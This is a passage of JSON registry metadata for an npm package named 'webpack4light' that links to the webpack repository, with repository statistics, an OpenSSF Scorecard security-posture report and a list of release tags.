stuff.","homepage":"https://github.com/webpack/webpack","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/webpack/webpack","keywords_array":[],"namespace":null,"versions_count":1,"first_release_published_at":"2018-07-13T08:56:05.024Z","latest_release_published_at":"2018-07-13T08:56:05.024Z","latest_release_number":"3.12.0-1","last_synced_at":"2026-09-03T00:22:01.178Z","created_at":"2022-04-10T03:39:33.394Z","updated_at":"2026-09-03T00:22:01.178Z","registry_url":"https://www.npmjs.com/package/webpack4light","install_command":"npm install webpack4light","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"3.12.0-1"},"contentPolicy":null},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom stuff.","archived":false,"fork":false,"pushed_at":"2026-08-15T12:07:17.000Z","size":95092,"stargazers_count":65979,"open_issues_count":146,"forks_count":9532,"subscribers_count":1466,"default_branch":"main","last_synced_at":"2026-08-15T12:07:29.192Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":"GOVERNANCE.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2026-08-15T11:34:15.000Z","dependencies_parsed_at":"2026-08-08T12:34:57.314Z","dependency_job_id":null,"html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":12493,"total_committers":934,"mean_commits":"13.375802997858672","dds":0.5586328343872569,"last_synced_commit":"89dfc9a5c575dc691e3ac6a965d39c854fca3986"},"previous_names":[],"tags_count":670,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/sbom","scorecard":{"id":546233,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack","commit":"de79ee457eb921e6e1b186c90c65590789a013ca"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6,"checks":[{"name":"Code-Review","score":5,"reason":"Found 12/24 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#packaging"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 12 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/examples.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:13","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#token-permissions"}},{"name":"Security-Policy","score":9,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Warn: One or no descriptive hints of disclosure, vulnerability, and/or timelines in security policy","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#branch-protection"}},{"name":"Binary-Artifacts","score":0,"reason":"binaries present in source code","details":["Warn: binary detected: examples/nodejs-addons/file.node:1","Warn: binary detected: examples/wasm-bindgen-esm/pkg/hi_wasm_bg.wasm:1","Warn: binary detected: examples/wasm-simple/add.wasm:1","Warn: binary detected: examples/wasm-simple/factorial.wasm:1","Warn: binary detected: examples/wasm-simple/fibonacci.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory2.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory3.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/other.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/wasm.wasm:1","Warn: binary detected: test/cases/wasm/imports-multiple/wasm.wasm:1","Warn: binary detected: test/cases/wasm/v128/v128.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/testFunction.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/configCases/wasm/externref/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/configCases/wasm/missing-wasm-experiment/wasm.wasm:1","Warn: binary detected: test/configCases/wasm/reference-types/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/0/wasm.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/1/wasm.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/examples.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:72: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:77: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:85: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:96: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:98: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:109: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:111: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:124: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:162: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:163: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:174: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:200: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:207: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Info:   0 out of  22 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-20T09:35:41.151Z","repository_id":2686067,"created_at":"2025-08-20T09:35:41.151Z","updated_at":"2025-08-20T09:35:41.151Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36783737,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-19T02:00:06.185Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false,"funding":{"open_collective":"webpack"}},"html_url":"https://github.com/webpack","funding_links":["https://opencollective.com/webpack"],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.109.2","sha":"6a24bd65b72c43207c36ce61b54e1f5833486906","kind":"tag","published_at":"2026-07-28T18:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2/manifests"},{"name":"v5.109.1","sha":"ec3908838175b79c004f61f9bf53d57a6d0e52f8","kind":"tag","published_at":"2026-07-27T21:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1/manifests"},{"name":"v5.109.0","sha":"21cd11a1f53567a42eee3a0be822b968a1ffcb12","kind":"tag","published_at":"2026-07-23T19:19:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0/manifests"},{"name":"v5.108.4","sha":"bb9ccfd32b8059819204a48bdb5436c9266dcdf0","kind":"tag","published_at":"2026-07-04T18:09:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4/manifests"},{"name":"v5.108.3","sha":"6844305fc2d9bceab547b6aae6fcd7ab12d598d8","kind":"tag","published_at":"2026-06-29T22:00:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3/manifests"},{"name":"v5.108.2","sha":"4dfe770e543f8e0c59184b9767e19b604d01af88","kind":"tag","published_at":"2026-06-29T12:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2/manifests"},{"name":"v5.108.1","sha":"da91761ed92c8e133ee321c7db4ad6c4698cae0a","kind":"tag","published_at":"2026-06-26T13:04:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1/manifests"},{"name":"v5.108.0","sha":"322b0603d6cae784063482cdc3cf8ca0b135a422","kind":"tag","published_at":"2026-06-25T09:40:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0/manifests"},{"name":"v5.107.2","sha":"cfb24a4af6ea68034b25f80e14f95aaeaad6d596","kind":"tag","published_at":"2026-05-25T15:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2/manifests"},{"name":"v5.107.1","sha":"a1ce7ebea4069d31ba27da07c07839d9dc1d69d6","kind":"tag","published_at":"2026-05-21T14:29:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1/manifests"},{"name":"v5.107.0","sha":"4657874201bb3a098445fca14e2f271c82a3f91c","kind":"tag","published_at":"2026-05-20T09:40:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0/manifests"},{"name":"v5.106.2","sha":"0d7e3e0153f0696311a590f90620506e8ab166ac","kind":"tag","published_at":"2026-04-15T11:44:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2/manifests"},{"name":"v5.106.1","sha":"a934b9bb0330aba61e759ef943b7303ba305959f","kind":"tag","published_at":"2026-04-10T10:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1/manifests"},{"name":"v5.106.0","sha":"8774a0110bea46f33fd2c504f59e698dbdcf136e","kind":"tag","published_at":"2026-04-08T15:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0/manifests"},{"name":"v5.105.4","sha":"27c13b44c861908793f160f9f7413b32543c0522","kind":"tag","published_at":"2026-03-03T16:29:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4/manifests"},{"name":"v5.105.3","sha":"714a0e3496f2189f76b5d2c98eacdeedae9e7c06","kind":"tag","published_at":"2026-02-26T10:27:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3/manifests"},{"name":"v5.105.2","sha":"0756c7eb697a7759afe081a1fcf8f5481ea06bc3","kind":"tag","published_at":"2026-02-12T15:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2/manifests"},{"name":"v5.105.1","sha":"8e50ef2035b9cb727aeaa97d7561545d1c102b91","kind":"tag","published_at":"2026-02-10T15:01:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1/manifests"},{"name":"v5.105.0","sha":"1486f9aacca11d79dbb7ddbceed29b7e6df7a7ab","kind":"tag","published_at":"2026-02-03T15:30:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0/manifests"},{"name":"v5.104.1","sha":"24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc","kind":"commit","published_at":"2025-12-18T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1/manifests"},{"name":"v5.104.0","sha":"505a5e744fbcf4471ddb534bf1d4aebea9643c1b","kind":"com